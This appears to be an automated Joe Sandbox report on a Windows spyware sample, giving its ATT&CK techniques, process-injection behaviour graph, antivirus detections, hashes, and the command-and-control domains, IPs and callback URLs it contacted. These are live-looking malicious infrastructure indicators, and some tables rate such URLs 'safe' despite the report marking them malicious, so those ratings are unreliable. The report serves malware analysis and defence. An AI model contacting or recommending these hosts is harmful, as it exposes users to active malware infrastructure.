          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 432719 Sample: 5SXTKXCnqS Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 4 other signatures 2->42 10 5SXTKXCnqS.exe 20 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 5SXTKXCnqS.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 updatesz.com 184.154.132.108, 49747, 80 SINGLEHOP-LLCUS United States 17->30 32 centerstageacademyaz.com 184.168.131.241, 49743, 80 AS-26496-GO-DADDY-COM-LLCUS United States 17->32 34 2 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 msdt.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5SXTKXCnqS.exe30%VirustotalBrowse
          5SXTKXCnqS.exe30%ReversingLabsWin32.Spyware.Noon
          5SXTKXCnqS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.5SXTKXCnqS.exe.2170000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.5SXTKXCnqS.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.5SXTKXCnqS.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          14.2.msdt.exe.b552b0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.5SXTKXCnqS.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.1.5SXTKXCnqS.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.2.msdt.exe.509f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.5SXTKXCnqS.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://centerstage.academy/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDq0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.centerstageacademyaz.com/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.updatesz.com/hlx/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.updatesz.com/hlx/?wVSH=1q0nvnuESuCKkKkbLudmlC1kRF8eq+dUTLEJwYL638OOvnGjESXIW61pqUjqlD08HWSv&i0D=adKPlr0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          centerstageacademyaz.com
          		184.168.131.241
          		truetrue
            		unknown
            updatesz.com
            		184.154.132.108
            		truetrue
              		unknown
              www.updatesz.com
              		unknown
              		unknowntrue
                		unknown
                www.centerstageacademyaz.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.centerstageacademyaz.com/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlrtrue
                  • Avira URL Cloud: safe
                  		unknown
                  www.updatesz.com/hlx/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.updatesz.com/hlx/?wVSH=1q0nvnuESuCKkKkbLudmlC1kRF8eq+dUTLEJwYL638OOvnGjESXIW61pqUjqlD08HWSv&i0D=adKPlrtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.tiro.comexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorError5SXTKXCnqS.exefalse
                                		high
                                http://www.goodfont.co.krexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://centerstage.academy/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqmsdt.exe, 0000000E.00000002.501612375.000000000558F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comlexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://nsis.sf.net/NSIS_Error5SXTKXCnqS.exefalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.comexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comexplorer.exe, 00000003.00000000.265363781.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          184.168.131.241
                                          		centerstageacademyaz.comUnited States
                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                          184.154.132.108
                                          		updatesz.comUnited States
                                          		32475SINGLEHOP-LLCUStrue

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:432719
                                          Start date:10.06.2021
                                          Start time:17:41:33
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 0s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:5SXTKXCnqS (renamed file extension from none to exe)
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:23
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/4@2/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 23.1% (good quality ratio 20.8%)
                                          • Quality average: 75.8%
                                          • Quality standard deviation: 31.7%
                                          HCA Information:
                                          • Successful, ratio: 86%
                                          • Number of executed functions: 106
                                          • Number of non-executed functions: 168
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.193.48, 92.122.145.220, 52.147.198.201, 184.30.24.56, 20.82.209.183, 51.103.5.159, 93.184.221.240, 13.107.4.50, 92.122.213.247, 92.122.213.194, 20.54.26.129, 20.82.210.154
                                          • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, Edge-Prod-FRAr4b.env.au.au-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net
                                          • Not all processes where analyzed, report is missing behavior information

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          184.168.131.241AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                          • www.centerstageacademyaz.com/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
                                          #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                          • www.mnanoramaonline.com/dp3a/?6l6x=JpPDbdpPqJah&F4ClVX_=HMSedmBm6/hIWbSmMxUxYZbRrtDTwFsk+TyYRjGVNzdErelZVoFwy82MvW0W4Pxo5ExE
                                          Payment receipt MT103.exeGet hashmaliciousBrowse
                                          • www.2006almadenrd.com/n86i/?3fDpH=EncZcG68c0UFvrfaep8p5kHr59rKeBqDHDmJoTlHDlH5Q19q6THcE1BV1jQP2/4tmveZ&Vjo=1bT0vz7
                                          New Order.exeGet hashmaliciousBrowse
                                          • www.flockuplabs.com/uqf5/?mVS=CH5D6h5PGn4ts&3fCDL=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/ArNV1zcwD6YY
                                          NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                          • www.cohorsetrails.com/j7e/?iP_T-V=s4TxBF2&F8EdvhY=0uFKBmvmOY3N1cR6tfDjvpZ4XCwo5tCp3URJWx4vIEcYZHH/ZYklCf5hgzXfIPGP0WLm
                                          oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                          • www.covid-19-411.com/c6ss/?P6AT72s=DB71Bym9Rr14TfwtieeaSq+XP6MPPP3k6OJ3eYsEhcCNhSwkByfhm8SfoYhSpsTVm4Za&j6A4qv=gJBt3
                                          qXDtb88hht.exeGet hashmaliciousBrowse
                                          • www.thriveglucose.com/p2io/?Z8E=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6&b0GDi6=Q6Ahtfox
                                          a8eC6O6okf.exeGet hashmaliciousBrowse
                                          • www.oceancollaborative.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOeXG6ZsHsCfG
                                          Telex_Payment.exeGet hashmaliciousBrowse
                                          • www.avaatraelegant.com/m3rc/?hTk8tpm=TSQTGbGl+UafldaDY7iOrPnVdHYt9Ypfw/QiU1mtcNJ1KwINQbFG4EVzsaDm0ZQusGTd&I4=5jxX5BaX4hy8-j8
                                          QyKNw7NioL.exeGet hashmaliciousBrowse
                                          • www.thriveglucose.com/p2io/?m4=PditjTvx4PwX_x-&aBd=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YuKFK/aPa09
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • www.ingenious.care/uqf5/?9rw=IyvMBxqM8mznciPJtkomKlfF/kq/6zAZ/NulsdYJ5cntVs/S9fIvdvtMsAQ76USE273s&s6=bPYXfd3Xq0VHDp
                                          SOA #093732.exeGet hashmaliciousBrowse
                                          • www.xn--arepasantabrbara-pmb.com/hme1/?jPw=2SPw7LQlaa7cti3Mn2rz6TCjd7lU8jHnPITUh2R4n2dBA+x2SVgAgss/958kYo9ATjis&y2JhS=6lr41hZpgNXtF
                                          rHk5KU7bfT.exeGet hashmaliciousBrowse
                                          • www.rvvikings.com/dxe/?TfTl=jHjQ1sEHwNXw4n+A/8fpKnaO6SpchAkuZ+GgFHi7AN8kb2XA0i8OmoFepGcQzHHYqc9c&7nGt5=h6Altfix
                                          Order.exeGet hashmaliciousBrowse
                                          • www.complexscale.net/jogt/?w6ATB0=mM0Ck4zU/d9hG5lVEWeH7uQPwyvlCbjgstqvdurAh1ZdTH4Yqc2sgGmD0X7Q/SemRdxv&Jxox=Er6tXhMxl
                                          VubYcOdGjQ.exeGet hashmaliciousBrowse
                                          • www.theguyscave.com/k8n/?wR-T-=ETYdeRC&5jn=ffRSpgj0URUgPhDkzfA3YdlDQQz5pJJRybkyQxcySljT84fGDbAnWSnhJv/zp2N19SZb
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • www.getthistle.com/q4kr/?w2MLb=6lux&QtRl=Jt1JO2t971959LrdDM/EJ1cvA97Pwm/HDqPg7v3P69I8XU+CUZlUHoU2RjaRLLQwrinB
                                          Neworder.exeGet hashmaliciousBrowse
                                          • www.kanitanaillounge.com/jogt/?PlQ8j=jKXq1ZQHcPBM/dFmsG96Rrq7SiC5kuIPSSiD8Dd2ip+Nb1yUpyUL4OnIzbOoJzgaBXqf&2db=g0G0iLxxPHIT
                                          Request for Price W912D2-19-Q-0004.exeGet hashmaliciousBrowse
                                          • www.blackwomencamp.net/egem/?2dCHQ=s0ILlWrMQzsGp3p1RmAY3qUukEAkmJAYYPkleJQvQBxBfoOdmLxTHansmvlw5WkCayf3&7nDtA=f2JDOtyx2xtDzteP
                                          Ack0527073465.exeGet hashmaliciousBrowse
                                          • www.cohenasssets.net/5yue/?3fJx=KYutaNEAIvarQ918ErbJ+YDUvzOLVJKXYG8C/UFRJ6ixESNgaf8eKtytrZ1l6vvKrhJX&2dC4V=P48T-VYXSzrLax
                                          Product_Samples.exeGet hashmaliciousBrowse
                                          • www.drlisatharler.com/m3rc/?j48=S9zQIxIAxlHw3AhG2oij4tyqbwYeiyo/TLihsL6vT2Jmjs5l/Hr2XRCnRYAhYdjvl6NmGr7rCg==&vRC=5jdD624HmJID8lJP

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          AS-26496-GO-DADDY-COM-LLCUSAWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          619wGDCTZA.exeGet hashmaliciousBrowse
                                          • 23.229.215.137
                                          Documents_13134976_1377491379.xlsbGet hashmaliciousBrowse
                                          • 107.180.50.232
                                          #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          Payment receipt MT103.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          research-531942606.xlsbGet hashmaliciousBrowse
                                          • 72.167.211.83
                                          research-121105165.xlsbGet hashmaliciousBrowse
                                          • 72.167.211.83
                                          research-76934760.xlsbGet hashmaliciousBrowse
                                          • 72.167.211.83
                                          research-1960540844.xlsxGet hashmaliciousBrowse
                                          • 72.167.211.83
                                          research-1110827633.xlsbGet hashmaliciousBrowse
                                          • 72.167.211.83
                                          DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                          • 148.66.138.158
                                          New Order.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                          • 148.66.138.158
                                          NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          qXDtb88hht.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          a8eC6O6okf.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          Telex_Payment.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          QyKNw7NioL.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          SINGLEHOP-LLCUSPayment slip.exeGet hashmaliciousBrowse
                                          • 198.20.110.232
                                          PO4358492133-REF30.docGet hashmaliciousBrowse
                                          • 184.154.190.82
                                          1092991(JB#082).exeGet hashmaliciousBrowse
                                          • 198.20.110.232
                                          Qgc2Nreer3.exeGet hashmaliciousBrowse
                                          • 198.143.164.252
                                          OoFyX2nTbB.exeGet hashmaliciousBrowse
                                          • 184.154.132.108
                                          Payment.htmlGet hashmaliciousBrowse
                                          • 63.251.14.14
                                          proforma invoice.exeGet hashmaliciousBrowse
                                          • 198.20.110.232
                                          $RAULIU9.exeGet hashmaliciousBrowse
                                          • 172.96.187.217
                                          BN45.vbsGet hashmaliciousBrowse
                                          • 198.20.110.126
                                          LMNF434.vbsGet hashmaliciousBrowse
                                          • 172.96.187.2
                                          SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                          • 172.96.187.2
                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                          • 184.154.83.252
                                          export of bill 896621.xlsmGet hashmaliciousBrowse
                                          • 184.154.83.252
                                          scan of invoice 4366307.xlsmGet hashmaliciousBrowse
                                          • 184.154.83.252
                                          FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                          • 198.20.110.126
                                          cf9f3c05-00c9-4008-846e-7d9a88232305.exeGet hashmaliciousBrowse
                                          • 184.154.27.242
                                          Spetrum-invoice-95144511.vbsGet hashmaliciousBrowse
                                          • 172.96.187.2
                                          4GGwmv0AJm.exeGet hashmaliciousBrowse
                                          • 173.236.127.29
                                          DX35.vbsGet hashmaliciousBrowse
                                          • 172.96.186.134
                                          Y8G0OTN7.htmGet hashmaliciousBrowse
                                          • 173.236.35.188

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dlli6xFULh8J5.exeGet hashmaliciousBrowse
                                            AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                              090049000009000.exeGet hashmaliciousBrowse
                                                dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                  PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                    Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                      Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                        UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                          Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                            3arZKnr21W.exeGet hashmaliciousBrowse
                                                              Shipping receipt.exeGet hashmaliciousBrowse
                                                                New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                  YZ8OvkljWm.exeGet hashmaliciousBrowse
                                                                    U03c2doc.exeGet hashmaliciousBrowse
                                                                      QUOTE061021.exeGet hashmaliciousBrowse
                                                                        PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                          PO187439.exeGet hashmaliciousBrowse
                                                                            090009000000090.exeGet hashmaliciousBrowse
                                                                              NEWORDERLIST.exeGet hashmaliciousBrowse
                                                                                00404000004.exeGet hashmaliciousBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\02vqprgl0atfidc
                                                                                  Process:C:\Users\user\Desktop\5SXTKXCnqS.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):185856
                                                                                  Entropy (8bit):7.998940517618347
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:sGXmBfAYT/4RnQPu5PBTgJApkOdFuKxnZMfSWVgVBratxWRHkFIhFQ:sbVZanguBdgJ2JdF/ZMqNbatxWREr
                                                                                  MD5:378DDC5CCA93C62AF29C52E3A139BB7A
                                                                                  SHA1:04C1B1F9C5AF921764E29E654D2D87E80D47C470
                                                                                  SHA-256:7AFCBE7E43FFCFC7268EFAF45629E6B6ED931145C9E5E820D60C5C9B50B0A1C5
